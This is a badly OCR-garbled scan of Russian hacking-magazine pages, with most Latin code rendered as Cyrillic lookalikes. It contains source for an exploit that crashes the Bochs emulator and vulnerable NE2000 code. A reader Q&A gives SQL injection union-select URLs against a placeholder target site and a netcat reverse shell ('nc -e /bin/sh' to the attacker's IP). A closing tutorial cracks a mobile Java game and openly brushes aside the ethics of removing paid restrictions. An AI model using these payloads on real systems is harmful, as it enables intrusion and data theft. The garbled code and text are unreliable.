ИСХОДНЫЙ КОД ЭКСПЛОЙТА, ВЫЗЫВАЮЩИЙ ПЕРЕПОЛНЕНИЕ 

БУФЕРА В ЭМУЛЯТОРЕ В0СН5 2.3 С ПОСЛЕДУЮЩИМ ОТКАЗОМ 

В ОБСЛУЖИВАНИИ 

#іпс1ийе <зуз/іо.Ь> 
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іпб таіп(іпб агдс , скаг **агдѵ) 

{ 

іорі (3) ; 

оибм ( 0x5292 , 0x24с); 
оибѵДОхбббб, 0x245) ; (а) 
оибѵДОхІббЪ, 0х24е) ; 
оибЪ ( 0x7 б , 0x2 41); 
оибЪ(0х7Ъ, 0x240); 
оибм ( 0х79с4 , 0x247); 
оибм ( 0x5 9 е 6 , 0x2 40); 
гебигп 0; 

} 

Покопавшись в исторических хрониках, можнотакже обнаружить 
имевшую место быть ошибку переполнения кучи в модуле вирту- 
альной сетевой карты N Е2000 НХ, которая осуществляласьзаписью 
слишком большого числа в регистр ТХСЫТ, что позволяло модифи- 
цировать памятьэмулятора. Исходный код уязвимого фрагмента 
последнего приведен ниже: 

ФРАГМЕНТ ИСХОДНОГО КОДА УЯЗВИМОГО МОДУЛЯ ЭМУЛЯТО- 
РА СЕТЕВОЙ КАРТЫ №2000 ВХ 

ѵоісі Ьх_пе2к_с : : гх_бгате ( 
сопзб ѵоісі *Ъиб, 
ипзідпесі іо_1еп) 

{ 

/*...*/ 

// сору іпбо Ъиббег, ирсіабе сиграде , апсі 
// зідпаі іпбеггирб іб сопбід'сі 
збагбрбг = &ВХ_ЫЕ2К_ТНІЗ з .шеш [ВХ_ЫЕ2К_ТНІ8з . 
сигг_раде*2 5 6-ВХ_ЫЕ2К_МЕМЗТАКТ ] ; 

іб ( (пехбраде > ВХ_ЫЕ2К_ТНІЗ з.сигг_раде) I I 
( ( ВХДМЕ 2 К_ТН 1 8 з.сигг_раде + радез) = = 
ВХ_ЫЕ2К_ТНІЗ з . раде_збор) ) 

{ 

тетеру ( збагбрбг , ркбМг, 4); 
шешсру ( збагбрбг + 4, Ьиб, іо_1еп) ; 
ВХ_ЫЕ2К_ТНІ8 з . сигг_раде = пехбраде; 

/*...*/ 

Впрочем, не известно ни одного зловредного кода, реально исполь- 
зующего этууязвимостьдля своего блага. Междутем с ростом попу- 
лярности виртуальных машин как инструмента «трепанации» малвари 
создатели последней уже начинают задумываться о методах борьбы, 
оттачивая новыетехнологии нападения и обороны. ІКІ 
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взлом 






ЕВГЕНИЙ «СОНМЫ» ЕРМАКОВ 

/ Н АСК-Г АО@ВЕАІ_. ХАКЕР. КІІ / 




^0: НУЖНА УТИЛИТА ПОД НИКСЫ ДЛЯ МОНИТОРИНГА УРОВНЯ 
СИГНАЛА ѴѴІ-Н. ЧТО ПОДСКАЖЕШЬ? 

Для начала — Кіетер которая умеет определять уровень си гнала. 
Потом — утилита ѴѴаѵегтюп со своим удобным графиком, затем 
— ѴѴігеІезз Роѵѵег Меіег и ѴѴІаптеіег. 



ВоЧ^Я НОВИЧОК В ХАКИНГЕ ѴѴІ-РІ, ХОЧУ СПРОСИТЬ, КАК УЗНАТЬ, 
ЕСТЬ Л И ВО ВЗЛАМЫВАЕМОЙ СЕТИ ВЫХОД В ИНТЕРНЕТ? 

Вс?*А: Поможетанализтрафика по протоколу йНСР и обнаружение в нем 
ІР-адресов шлюзов. Задействуй установленный в программе 
ЕНегсар модуль ігііоп. 



(ф НУЖНО УЗНАТЬ ВСЕ СТОЛБЦЫ И ТАБЛИЦЫ В ОКАСІ.Е, НО КАК? 

&о*А: В этой СУБД существуюттаблицы, аналогичные I N РО РМ АТІ О Ы_ 

5СНЕМА.ТАВБЕ5 и ІМР0РМАТІ0І\І_5СНЕМАЛАВЕЕ5 в М55С1Е. Это 
таблицы 5Ѵ5.БІ5ЕП_ТАВЕЕ5 и 5У5.1І5ЕР_ТАВ_С0ШММ5. Узнать 
из них названия таблиц и колоноктакже легко, каки в М550Е: 



ЫсЦр : //ОагдеО . сот/зсгірЦ .р]тр?р=1 ипіоп зеіесЪ ДаЫе_ 
пате ігот зуз . изег_ЬаЫез-- 



Ата кже: 



ЫсДр : //РагдеР . сош/зсгірр .р]тр?р=1 ипіоп зеіеср со1итп_ 
пате Ргот зуз . изег_РаЬ_со!итпз-- 



Для выуживания всех колонок итаблиц поможет оператор гоѵѵпит. 
Пример: 



ЬРРр : //РагдеР . сот/зсгірр .р!ір?р=1 ипіоп зеіесР 
со1итп_пате Ргот зуз . изег_РаЬ_со1итпз ѵіЬеге 
гоѵѵпит <3-- 



ее 



► 052 _ 




^0: ПЕРЕДАЮ МЕТОДОМ Р05Т УЯЗВИМОМУ ПРИЛОЖЕНИЮ СВОИ 
ЗНАЧЕНИЯ, НО ПРИ ЭТОМ НЕ ПОЛУЧАЮ РЕЗУЛЬТАТА. ПОЧЕМУ? 

Вс?*А: Скорее всего, ты не изменяешьзначение НТТР-заголовка Сопіепі- 
БепдЬБ В этом полеуказана в символах длина данных, передавае- 
мых методом Р05Т. Таким образом, ты посылаешьсвои данные, не 
изменив значение их объема в СопІепІ-ЕепдІ-іБ и те обрабатыва- 
ются некорректно. 



^0: НЕ ПОЙМУ, В ЧЕМ ТРАБЛ: ПЫТАЮСЬ ВЫТАЩИТЬ ЧЕРЕЗ УЯЗВИ- 
МЫЙ СКРИПТ НАЗВАНИЯ ТАБЛИЦ И СТОЛБЦОВ В Р05Т6КЕ50Ц НО 
ОБЛАМЫВАЮСЬ. 

Вс?*А: В старых версиях РозідгеЗОБ неттаблицы ІМЕ0РМАТІ0М_5СНЕМА. 
ТАВБЕЗ/СОББІМЫЗ, хранящей названия всехтаблиц и столбцов. 
Возможно, из-за этого и не получается вытащить данные. Но 
вместо нее имеется таблица РѲ_ТАВБЕ5. 

Пример: 



ІіРРр : / /РагдеР . сот/зсгірр . рЬр?р=1 ипіоп зеіеср 
ТАВЬЕЫАМЕ Ргот РС_ТАВЬЕ8/ * * / 



Названия столбцов придется подбирать самому. 



^0: НУ А ЧТО ИЗ АНАЛОГИЧНОГО СОФТА ЕСТЬ ПОД КПК? 

Вс?*А: ѴѴІ-ЕІ Мападег, позволяющий посмотреть списокдоступных сетей и 

уровень сигнала от каждой из них. ѴѴі-Еі бгарЬ, дающая возможность 
моментально обнаруживать ѴѴІ-Еі сеть, находить ближайшую точку 
доступа и проводить мониторинг работы беспроводной сети. 

К сожалению, на данный момент ѴѴІ-ЕІ ОгарЬ поддержи ваеттолько модули 
связи, использующие чипсет Ргібгш, и КПК на базе некоторых 
других чипсетов. 



^0: Я ПРОШУ ДРУГА ПОМОЧЬ МНЕ В ПРОВЕДЕНИИ 50ЫШЕСТІ0Ы В 

МѴ50Ц А ОН СПРАШИВАЕТ ВЕРСИЮ СУБД. В ЧЕМ ОТЛИЧИЯ ВЕРСИЙ 

МУБОЬ? 

В^А: На самом деле отличия оченьзначительные. Рассмотримтри ветки 
МуЗСІЕ по порядку. Не будем затрагивать неважные для нас изме- 
нения в версиях. 

МуЗОБЗ.* — тут в принципе отсутствует оператор ЕІКІІОЫ. 

Му50Б4.* — появляется оператор БІМІОКІ. 

МуЗОБб.* — взломщики баз да иных аплодируют программистам МуЗОБ 
стоя — появиласьтаблица ІМЕ0РМАТІ0КІ.5СНЕМА_ТАВБЕ5. 
Вытащить данные из мускула стало еще легче. Теперь процесс 
взлома аналогичен взлому М550Б. 



ААОі ЕСТЬ НЕСКОЛЬКО ПРОСТЫХ ВОПРОСОВ ПО ВЕБ-ВЗЛОМУ: 

1 . ТОЧНО ЗНАЮ, ЧТО НА СЕРВЕРЕ СУЩЕСТВУЕТ ОПРЕДЕЛЕННАЯ 

ДИРЕКТОРИЯ, НО, ОБРАЩАЯСЬ К НЕЙ, Я ПОЛУЧАЮ ТОЛЬКО ПУСТУЮ 

СТРАНИЦУ. В ЧЕМ ДЕЛО? 

2. НЕ МОГУ ПОДОБРАТЬ ИМЕНА ТАБЛ ИЦ И КОЛОНОК В БД. КАК БЫТЬ? 

В^А: 1. Админы незабили на безопасность и создали файл .Ыассезз, огра- 
ничивающий просмотр диры по ІР-адресу просматривающего. 

2. Когда вопрос касается технического аспекта взлома, так просто сказать 
ничего нельзя. Ну а вообще, иногда названия переменных Ыті- 
форм совпадаютс реальными названиямитаблиц/колонок. К 
примеру, имеем форму для входа в админку, смотрим ее код: 



ссііѵ с1азз= " іприЪІаЬеІ " >Имя</с1іѵ> 

ссІіѵхіприВ О іШе= "Введите ваше имя " пате= "из тате" 

Цуре="ЦехЦ" с1азз= " іприЫэох" зІ 2 е=" 15" /></<ііѵ> 
ссііѵ с1азз= " іприВІаЬеІ " >Пароль</с1іѵ> 

ссІіѵхіприЪ ЦіВІе=" Здесь введите пароль " пате="разз" 
Цуре= "раззѵлэгсі" с1азз= " іприВЬох" зІ2е="15" /></ 
с!іѵ> 



Видим передаваемые скрипту параметры изгпате и разе. Пытаемся 
использовать их в качестве имен колонок. 
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Ьккр : //кагдек . сот/зсгірк . ркр?р=1 ипіоп зеіеск 
изегпате, разз кгот каЫе_пате/* 



Если известно названиеуязвимого движка и его сорцы есть в интернете, 
просто качаем их и смотрим файл, отвечающий за создание струк- 
туры БД (чаще всего это іпвіаІІ.рЬр). Втаком скрипте прописаны 
команды для созданиютаблиц и столбцов в базеданных. 

К примеру, естьбажная СМ5 — Тагдеі: СМ5. Смотрим кусок кода из файла 
іпзІаП.рЬр: 



СКЕАТЕ ТАВЬЕ ассоипкз ( 

Ій ШТ РКІМАКУ КЕУ , 
изегпате СНАК (10) , 
раззѵгогсі СНАК ( 8 ) , 
етаіі СНАК (20) 

Здесь мы видим структуру будущей БД — нужные нам названия таблиц и 
столбцов. 

^0: НЕДАВНО ВСТРЕТИЛ НЕПОНЯТНЫЙ МНЕ ТЕРМИН — КЕѴЕК5Е 

ТЕІ.ЫЕТ. ЧТО ЭТО? 

^А: Думаю, ты слышал о Ьаск-соппеск Так вотэто и естьтотсамый ре- 
версивныйтелнет. На всякий случай напомню, что Ьаск-соппесі 
— это инициализация іеіпеі-соединения сервером к взломщику. 
Используется для обхода на взломанном сервере файрвола, 
препятствующего прямому соединению хакера с сервером. Для 
геѵегвеіеіпеі используется известная утилита ЫеісаТ запущенная 
на ПКвзломщика и на самом взламываемом сервере. 

У себя в Іеіпеі мы пишем следующее: 

пс -1 -р 123 

Так мы запускаем Ыеісаі в режиме ожидания подключения клокальному 
порту 123. 

На сервере, инициализирующем соединение, пишем: 
пс -е /Ьіп/зЬ НАШ_І Р 123 

^0: НУ А КАК МНЕ, КАК АДМИНУ, ЗАЩИТИТЬСЯ ОТ ВОЗМОЖНОСТИ 

ПОДКЛЮЧЕНИЯ ЧЕРЕЗ ОБРАТНЫЙ ТЕЛНЕТ? 

1=>А: Запретить через брандмауэр соединения, исходящие от внутреннего 
узла или ѵѵеЬ-сервера, атакже правильно расставить сЬтосГы на 
исполняемые файлы, позволив использовать ихтолько владельцам. 

^0: ХОЧУ УСТРОИТЬ СВОЕМУ ПРОЦУ ЧТО-ТО ВРОДЕ ВЕЫСНМАКК’А 

ПО ВЗЛОМУ М05. ЭТО ВОЗМОЖНО? 

Во-А: Конечно. Скачиваем МРСгаск [ ЬирУ/тетЬгез.ІѵсозТг/тбсгаск ) и 
запускаем из консоли с ключом ЬепсЬтагк: 

МБСгаск- з зе . ехе - -Ьепсізтагк 

^0: СКОРО СТАНУ ДИПЛОМИРОВАННЫМ СПЕЦОМ ПО ИНФОБЕЗУ 

— ПОЯВИЛАСЬ ПАРА ВОПРОСОВ ПО ТРУДОУСТРОЙСТВУ: 

1. СЕЙЧАС В СЕТИ КУЧА ОНЛАЙН-ТЕСТОВ ПО САМЫМ РАЗНЫМ ОБ- 
ЛАСТЯМ, В ТОМ ЧИСЛЕ И ПО ИБ. ИМЕЕТ ЛИ СМЫСЛ ЕГО ПРОХОДИТЬ 



И БУДЕТ ЛИ ОН ИГРАТЬ РОЛЬ ПРИ ТРУДОУСТРОЙСТВЕ? 

2. КАКИЕ КОНКРЕТНО ФАКТОРЫ ВЛИЯЮТ НА ТРУДОУСТРОЙСТВО И 
ЗАРАБОТНУЮ ПЛАТУ В ОБЛАСТИ И Б? 

3. КАКИЕ КОНКРЕТНО НАВЫКИ ТРЕБУЮТСЯ ПРИ ТРУДОУСТРОЙСТВЕ 
СПЕЦИАЛИСТОМ ПО ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ? 

ВО'А: 1 . Сертификаты пройденных ру-тестирований в серьезных компаниях не 
котируются. Главную роль и грают опыт работы в нужной для конторы 
области (ИБ, кпримеру) и навыки, перечень которыхтакже уста- 
навливает контора-работодатель. Крометого, в ру-сегменте мне не 
встречались качественные, проверенные временемтестирования 
по информационной безопасности. Но если утебя есть опыт работы и 
необходимые знания, тогда сертификат может быть плюсом. 

2. Какя уже сказал, соответствующие навыки и, главное, опыт. Как прави- 

ло, компаниям требуются сотрудники с опытом работы 1-3 года. 
Далее, большое значение имеют рекомендации с места прежней 
работы. Даже если сначала, при собеседовании, тебе никто не 
сказал, что требуетсязнаниеанглийского языка, все равно не 
стоит расслабляться — рано или поздно хорошее владениетехни- 
ческим инглишем обязательно понадобится. 

3. Заранее скажу, что в большинстве случаев после окончания вуза (все 

зависит отспециальности) многие навыки приходится осваивать 
самостоятельно. 

Вотпримертребований к кандидату в среднестатистической фирме, в 
которой открыта вакансия спеца по ИБ: 

Языки программирования: С/С++, А55еппЫегх86. 

Знание сетевыхтехнологий, сетевых протоколов на низком уровне, опыт 
разработки. 

Знание архитектуры 05, ѴѴІп32 АРІ, особенностей загрузки модулей, орга- 
низации Ьеар и др. 

Желательно: знание БОК, принципов низкоуровневых перехватов сис- 
темных функций, работа с внутренними недокументированными 
структурами 05. 

Знание ЮА/5оШСЕ/ѴѴіпОВО. 

Умение работать с технической документацией, проведение «исследований». 
Опыт по анализу существующих ргоо^ о^ сопсері (РоС) уязвимостей, 
ехріоііз, збеіісосіез, Іеакіезів (для Ггеѵѵаіі и НІР5). 

Опыт поиска уязвимостей в пользовательских приложениях, системных 
сервисах, разработки демонстрационныхэксплойтов под них. 
Представление о НТМІ_, БНТМЦ ЗаѵаЗсгірІ, ѴВ5сгірі сточки зрения 
возможныхугроз. 

Желательно: опыттестирования Ггеѵѵаіі на предмет безопасности. 
Желательно: опыт обхода сопіепі-фильтров (ЬИр), Ю5. 

Желательно: опыт обхода существующих средств защиты разграничения 
доступа, НІР5, антивирусов, Іігеѵѵаіі 
Навыки геѵегзе епдіпеегіпд и/или репеігабоп іезбпд, знание ѵх/гооікк- 
технологий. 

^0: ХОЧУ «ОТПУГНУТЬ» ЮНЫХ КУЛ-ХАКЕРОВ ОТ СВОЕГО ЕЩЕ НЕ 
ПРОТЕСТИРОВАННОГО РНР-ДВИЖКА. ВОЗМОЖНО ЛИ ЭТО? 

Во*А: Да. Я не буду вспоминать наипростейшие средства, которые уже 

былиописаны в РАСГе. Как вариант — обработка файлов с различ- 
ными расширениями как РНР-скриптов: 

АсІсІТуре арріісакіоп/х-ітккрсі-ріір .рі . азр . ккті .ккт 

Теперь можно указать нашим скриптам любое обозначенное выше 
расширение. ШС 
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НАДОЕЛО ПЛАТИТЬ ЗАМОБИЛЬНЫЕ ИГРЫ? ЗАКОЛЕБАЛА ЧЕРЕДА БЕСКОНЕЧНЫХ 
СМЕРТЕЙ? ХОЧЕТСЯ ПЕРЕДЕЛАТЬ СПРАЙТЫ/ТЕКСТЫ/ЗАСТАВКУ ПОД СВОЙ ВКУС? 
НЕТНИЧЕГО ПРОЩЕ! МОБИЛЬНЫЕ ИГРЫ ВЕСЬМА КОМПАКТНЫ И ПОТОМУПРОСТЫ 
ДЛЯ ВЗЛОМАЙ АНАЛИЗА, А НАДРУГАТЬСЯ НАДНИМИ ПО СИЛАМ ДАЖЕ НАЧИНАЮ- 
ЩЕМУ ХАКЕРУ. ЭТА СТАТЬЯ ПОМОЖЕТ ЕМУ СДЕЛАТЬ ПЕРВЫЕ ШАГИ, ПОСЛЕ КОТО- 
РЫХ ОН БУДЕТ ОТТАЧИВАТЬ ХАКЕРСКОЕ МАСТЕРСТВО УЖЕ САМОСТОЯТЕЛЬНО. 



опулярность мобильных игр стремительно растет. Они 
прочно оккупировали рыноксотовыхтелефонов, комму- 
никаторов, смартфонов, карманных компьютеров и других 
аналогичныхустройств. Большинство игр распространя- 
ется на условно-бесплатной основе: когда необходимо платить, иначе 
блокируют часть возможностей и/или ограничивают количество запусков. 
Но даже полностью бесплатные игры не лишены недостатков. Неудоб- 
ное управление, быстро кончающиеся жизни — да мало ли существует 
причин, побуждающих хакера дорабатывать код в соответствии со своими 
предпочтениями? Этические проблемы взлома нас не волнуют, поэтому 
мы немедленно переходим ктехнической части, благо хвост уже зудит, 
чешется и рвется в бой. О взломе мобильных игр написано много, но все 
как-то неконкретно и не втему. Нетак-то просто обобщить свой опыт и 
передать его другим. Ноя всеже попробовал. 

МОБИЛЬНЫЕ ПЛАТФОРМЫ 

Основная масса мобильных игр (по некоторым оценкам аждо -70%) 
пишется на Заѵа, а точнее, на 32МЕ, что расшифровывается как Заѵа 2 
Місго Ебібоп. Это урезанная версия языка Заѵа, ориентированная на ма- 
ломощные системы и поддерживающая огромное множество мобильных 
устройств. Вместо живого машинного кода, сотовомутелефону подсо- 
вываюттак называемый «байт-код», исполняющийся на виртуальной 
Заѵа-машине (Даѵа Ѵігіиаі МасЫпе, или сокращенно ЗѴМ). Теоретически 



игра, написанная для одного сотового телефона, будет работать на любом 
другом, независимо от особенностей его аппаратного обеспечения, что 
оченьхорошо (хотя на практике переносимость намного хуже). Расплачи- 
ваться за это приходится драматическим падением производительности 
вусловиях и без того маломощных микропроцессоров. 

Продвинутые игры (наподобие ЕідЫ Нагб ЗБ и РісІегХЭй) пишутся на 
чистом машинном коде и потому могут исполняться только на микропро- 
цессорах одного семейства (например, АРМ 6), что ограничивает сферу 
их применения. В настоящей статье они не рассматриваются. Поскольку 
нельзя объять необъятное, мы сосредоточимся исключительно на взломе 
Заѵа-приложений, а до Рід Ы; Нагб доберемся не раньше, чем я куплю 
соответствующий сотовый телефон. 

ЧЕМ МЫ БУДЕТ ЛОМАТЬ 

Выбор хакерского инструментария — дело сугубо личное и, можно даже 
сказать, интимное. Поэтому не следует воспринимать приведенный 
ниже список как догму. Это всего лишь один из вариантов. Практически 
все обозначенныеутилиты реализованы в двух-трех вариантах, как 
консольных, так и графических. Так что каждый может найти программу 
на свой вкус. Предлагаемая подборка включает в себя только бесплатные 
программы, игнорируя их коммерческие аналоги, иначе это не хакерство 
получилось бы, а сплошной рекурсивный спуск (чтобы сломать мобиль- 
ную игру, нужно хакнуть программу, которая ее ломает). 
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Прежде всего нам потребуется спецификация на байт-код виртуальной 
^ѵа-машины, выложенная на официальном сайте корпорации 5ип (на 
английском языке): ЬНрУ/іаѵа.Бипщот/гіосз/Ьоокз/іѵтз/зесопсІ ебібоп/ 
Ыт[/ѴМ5ресТ0С.бос.Ыт[ . при этом знать сам язык ^ѵа нисколько 
не обязательно, хотя и желательно. Во всяком случае, я несколько лет 
успешнохачил ^ѵа-приложения непосредственно в .1ѴМ, пока, наконец, 
не купил «Горький вкус ^ѵа» Брюса Тейта и не разобрался с основными 
языковыми концепциями, которые, кстати сказать, ничуть не облегчили 
ни дизассемблирование байт-кода, ни его анализ. 

Лучшим дизассемблером ^ѵа-программ была и остается легендарная 
ЮА Рго, распространяющаяся на коммерческой основе за нехилые день- 
ги, однако при желании можно обойтись и без нее, воспользовавшись 
штатным дизассемблером, входящим в бесплатный .^ѵа 5БК, или любой 
другой утилитой аналогичного назначения, которых в последнее время 
развелось как грибов (смотри Лаѵа В ііе, описанный ниже). 

Чтобы не корячиться над анализом байт- кода, имеет смысл прогнать 
ломаемое приложение через ^ѵа -декомпилятор, выдающий вполне 
читабельные и структурированные листинги, ^ѵа -декомпиляторов 
существует много. Хороших и разных. Я рекомендую бесплатный 
аѵаОес Ьу ѵѵі, которым пользуюсь сам и который можно скачать с 
ѵѵѵѵѵѵ.ѵѵа5гю.ги/Ьаіхабо.рЬр?тобе=Іоо[&ісІ=362 . Еще стоит попро- 
бовать ЗОесотрі Іе г с Ьир://]аѵа-бесотрі[ег.дагсЫѵе.огд . Он тоже 
неплох и бесплатен. Декомпилированный код можно хачить прямо в 
исходных текстах с последующей ре компиляцией, ноя этого делать 
не рекомендую, поскольку декомпилятор не всегда работает кор- 
ректно и повторная компиляция зачастую ведет к краху программы, 
поэтому лучше патчить непосредственно сам байт-код. 

Для модификации байт-кода (то есть«бит-хака») подойдетлюбой Ьех- 
редактор, например всем известный Ьіеѵѵ, однако лучше использовать 
специализированные инструменты, лучшим из которых является бес- 
платный ЗаѵаВІІе Ьу ВііАНз, наглядно отображающий дерево классов, а 
также включающий в себя дизассемблер и ассемблер байт-кода 
( ѵѵѵѵѵѵ.ѵѵа5т.ги/Ьаіхабо.рЬр?тобе=іоо[&іб=284 ). 

Мобильные игры, как правило, распространяются в виде упакованных 
іаг-файлов, создаваемых одноименной утилитой, входящей в состав 
Заѵа 5БК, однако это не единственно возможный вариант. Архиваторы 
72ІР (бесплатный) и ѴѴІпАсе (условно-бесплатный) справляются со сво- 
ей задачей ничуть не хуже. Исключение составляют Заѵа-приложения, 
снабженные цифровыми подписями. Ни 721 Р, ни ѴѴІпАсе их создавать 
не умеют, да этого и не требуется. Любой сотовый телефон загрузитіаг- 
архив и без подписи. 

Иногда рядом с іаг-архивом лежитіасі-файл, без которого некоторые 
модели телефонов откажутся загружать Заѵа- приложение, и тут прихо- 



дится прибегать к помощи бесплатной утилиты ЗАБдеп, генерирующей 
іасі-файлы на основеіаг-архивов ( ШрУ/БоЛвеагсЬ.ги/ргодгатз/ІЗД- 
892-]абдеп-боѵѵп[оаб.5Ыт[ ). 

Некоторые хакеры для проверки работоспособности взломанных игр 
рекомендуют использовать эмулятор сотового телефона, другие же пред- 
почитаютживое железо, тем более что закачать приложение на телефон 
не проблема. Однако при этом существует возможностьзавесить аппарат 
так, что придется вынимать батарею или даже делать полный гезеі, 
удерживая определенные клавиши при включении (у каждой модели 
телефона свои), описание которых можно найти в сервисной докумен- 
тации. Впрочем, рискугробитьтелефон некорректным взломом очень 
сильно преувеличен. В 90% случаев некорректный хак пресекается жутко 
матерящимся Заѵа-верификатором. В 9% случаев игра просто зависает, 
подвешивая за собой весьтелефон. И только на 1 % приходится разру- 
шение содержимого энергонезависимой памяти и прочий бэд, так что 
неуверенным в себе хакерам все-таки стоит пользоваться эмулятором. 

ЧТО МЫ БУДЕМ ЛОМАТЬ 

А ломать мы будем милую игрушку Масготап (реинкарнацию культовой 
компьютерной игры, выпущенной в 1979 году японской компанией Ыатсо 
Тору и реализованной практически на всех8-битных компьютерахтипа 
2Х-5рес{гит), демонстрационная версия которой распространяется 
бесплатно и валяется практически на любом мобильном сайте: ѵѵѵѵѵѵ.сес. 
ги/РІІев/тасгоппап бетодаг . 

Поставим себезадачу обессмертить колобка, чтобы игра никогда не кон- 
чалась. Главное — разобраться стехникой и стратегией взлома, освоив 
основныехакерскиетрюки и приемы. Остальные программы ломаются 
аналогичным образом, и неважно, что это — вечная жизнь или снятие 
ограничения с количества запусков. 

Короче, кончай курить, мужики! Курить мы будет потом, а сейчас глотнем 
пива и возьмемся за дело. 

КАК МЫ БУДЕМ ЛОМАТЬ 

Пускаем мы, значит, Масготап и даем ему умереть в зубах зловредных су- 
ществ (типа приведений), агрессивно бегающих по лабиринту. На экране 
появляется надпись: «1 ІЛе БеТС» («Осталась одна жизнь»). Очевидно, что 
код, выводящий эту строку, такили иначесвязан с кодом, уменьшающим 
количество жизней при каждом акте поедания колобка. Во всяком случае, 
во всех императивных языках программирования (к которым принадле- 
жит и баѵа) ситуация обстоит именнотак. 

Вотэту строку мы и будем искать. Но сначала распакуем іаг-архив, пропус- 
тив его через 72 ІР (предварительно изменив расширение с іа г на 2 Ір). И 
вот что мы получим в результате: 
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• Масготап — Оаѵа- 
игрушка, над которой 
мы издеваемся на 
протяжении всей 
статьи : ѵѵѵѵѵѵ.сес.ги/ 
Рііез/тасготап 
сіетодаг : 

• ТЬе ОаѵаТМ Ѵійиаі 
МасЫпе Зресйісайоп 
ЗесопсІ Есііііоп 

— официальная 
спецификация на 
байт- код Оаѵа -маши- 
ны (на английском 
языке): бйрУДаѵа. 
вип.сот/сІосв/Ьоокз/ 
]ѵтз/зесопсІ есіійоп/ 
НітІ/ѴМБресТОС.сІос. 
Ытпі; 

• аѵайес 0.9Ь Ьу ѵѵі 

— хороший Оаѵа- 
декомпилятор, 
распространяемый на 
бесплатной основе: 
ѵѵѵѵѵѵ.ѵѵазпп.ги/ 
Ьаіхабо.рЬр?тобе= 
ІооІ&іб=362 : 

• ЮА РРО — лучший 
дизассемблер всех 
времен и народов, 
поддерживающий 
также и байт- код 
виртуальной Оаѵа- 
машины, распростра- 
няемый за нехилые 
деньги: ѵѵѵѵѵѵ.і бар го. 
сот : 

• баѵаВііе — дизас- 
семблер, ассемблер 
и модификатор байт- 
кода 6ѴМ в одном 
флаконе, распростра- 
няемый бесплатно 

с кучей разных пла- 
гинов И прочихтулз: 
ѵѵѵѵѵѵ.ѵѵазт.гц/Ьаіхабо. 
рЬр?тосіе=Іоо[&ісІ 
=284 : 

• бАйдеи — бес- 
платный генератор 
іасі-файлов, тре- 
буемых некоторыми 
моделями телефонов: 
ИйрУ/зоЙвеагсб. 
ги/ргодгатз/134- 
892-іабдеп-сІоѵѵпІоасІ . 
зЫтІ . 




СОДЕРЖИМОЕ РАСПАКОВАННОГО 6АВ-АРХИВА С ЛО- 
МАЕМОЙ ИГРОЙ 

МЕТА- ШЕ // директория с файлом манифеста 
ІМАСЕ8 // директория с изображениями лабирин- 
та и спрайтов в рпд 
МАСКОМАЕ / / директория с файлом 
МасготапМісІІеб . сіазз в байт-коде 

b. сіазз // файлы классов в байт-коде 

c . сіазз 
б. сіазз 
е . сіазз 
1 . сіазз 
д . сіазз 

Берем БАР (или любой другой файл-менеджер), давим 
<АБТ-Б7> (ЗеагсЬ), вводим маску файлов «*» (все файлы) и 
строку для поиска « Бііе Бей», которую и обнаруживаем через 
секунду поиска в файле е. сіазз, занимающем всего 1 9 Кб. 
Прогнав е. сіазз через 3 Бес (или любой другой декомпиля- 
тор), мы получаем текстовый файл е.іаѵа размером порядка 
36 Кб. Открываем его в РАР'е по <Р4> (Есііі), давим <Р7> 
(ЗеагсЫ и вновь ищем строку «Ы^е Бей», затаившуюся в 
недрах следующего кода: 

ДЕКОМПИЛИРОВАННЫЙ ФРАГМЕНТ МѴА-ПРОГРАМ- 
МЫ Р НАЙДЕННЫЙ ПОИСКОМ СТРОКИ «І_ІѴЕ І_ЕРТ» 

І1(ах<0) //<- переменная ах, хранящая в 
себе количество жизней 
{ 

Ъубе4 = 2 ; 

азі = пехѵ 8бгіпд[2] ; 
аз1[0] = "СашеОѵег" ; 
аз1[1] = "НіЗсоге: " + ад.е; 

Ьгеак; 

} 

іі (ах == 1) 

{ 

Ъубе4 = 1; 

азі = : іеы Збгіпд [Ьубе4 ] ; 

/ / искомая строка 

азі [ 0 ] = ах + " Ыбе Ьеііі " ; 

} 

Машинная логика вполне стандартна и особых пояснений не 
требует. Если переменная ах становится меньше нуля, мы по- 
лучаем «бате Оѵег», в противном случае на экран выводится 
количество оставшихся жизней. 

Следовательно, чтобы взломать программу, необходимо 



найти код, уменьшающий переменную ах на единицу при 
каждом акте смерти. А как мы его найдем? Да всетем же 
контекстным поиском! Ищем ах, анализируя прилегающий к 
ней код. Довольно быстро мы выкупим строку инициализа- 
ции, устанавливающую начальный счетчик жизней, равный 
двум (на самом делетрем, поскольку смерть наступает, 
только если ах меньше нуля): 

ФРАГМЕНТ КОДА, ОТВЕЧАЮЩИЙ ЗА НАЧАЛЬНОЕ 
КОЛИЧЕСТВОЖИЗНЕЙ 

ргіѵабе Ъубе ах; 

аѵ = 0; 
ах = 2 ; 

; // инициализация счетчика жизней 
1 . а ( ЬМз , а4 ) ; 

Можно, конечно, заменить строку «ах = 2» строкой «ах = 69» 
(например), но это порочный путь. Во-первых, вечной жиз- 
ни мы все равно не обретем, а во-вторых, еще неизвест- 
но, как программа отреагирует на такие издевательства 
(поскольку количество оставшихся жизней отображается 
в виде колобков внизу экрана, то при слишком большом их 
числе поведение программы рискует стать непредсказуе- 
мым). 

Ладно, идем дальше... и видим заветную команду «ах--» 
в методе Д), уменьшающую значение переменной ах на 
единицу: 

ДЕКОМПИЛИРОВАННЫЙ ФРАГМЕНТ МЕТОДА Р() р 
УМЕНЬШАЮЩЕГО ПЕРЕМЕННУЮ АХІСЧЕТЧИКЖИЗ- 
НЕЙ) НА ЕДИНИЦУ 

риЫіс ѵоіб 1 ( ) 

{ 

МасгошапМібІеб .с(); 
аз = 3; 

гетоѵеСошшапб (Ь) ; 
іі (ау <= 10 ) 

{ 

аббСоштапб ( а ) ; 
аббСошшапб ( е ) ; 

} 

еізе 

{ 

// здесь уменьшаются жизни! ! ! 
ах- - ; 
і 1 ( ах < 0 ) 

{ 

аббСошшапб (а) ; 
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С каждой смертью количествожизней увеличивается на единицу 
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Созданиеіаг-архива с помощью ѴѴІпАсе 



аббСоттапб ( е ) ; 
і 5 ( аѵ > ад . е ) 
ад . е = аѵ ; 

} 

еізе 

{ 

аббСоттапб ( Т ) ; 

} 

} 

с () ; 

} 



Вот это — то, что нам нужно! Остается найти байт-код, соответствующий 
этой конструкции языка высокого уровня. Воттут-то нам и пригодится ЮА 
Рго, ну или утилита ^ѵаВііе. Открыв файл е.сіазз в любой из этих про- 
грамм, переходим к методу Ш и внимательно исследуем код на предмет 
обращений к переменной ах. 

Как легко увидеть, в методе Ш обращение кпеременной ах встречается 
дважды: 



